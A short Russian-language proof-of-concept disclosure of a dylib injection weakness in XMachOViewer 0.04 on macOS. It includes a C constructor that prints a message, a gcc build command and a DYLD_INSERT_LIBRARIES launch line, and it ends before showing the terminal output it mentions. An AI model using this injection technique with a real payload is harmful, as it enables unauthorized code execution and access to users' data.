
Эксплойт (proof-of-concept) для уязвимости внедрения dylib в XMachOViewer 0.04, демонстрирующий несанкционированное выполнение кода через DYLD_INSERT_LIBRARIES на macOS.
Уязвимость внедрения dylib в XMachOViewer 0.04 позволяет злоумышленникам нарушить целостность. Используя её, можно внедрить несанкционированный код в процессы продукта, что потенциально может привести к удалённому управлению и несанкционированному доступу к конфиденциальным данным пользователя.

Переносная версия для macOS
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
Скомпилируйте
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
И внедрите его:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
Это откроет приложение и запустит dylib. После закрытия приложения мы видим это в терминале:
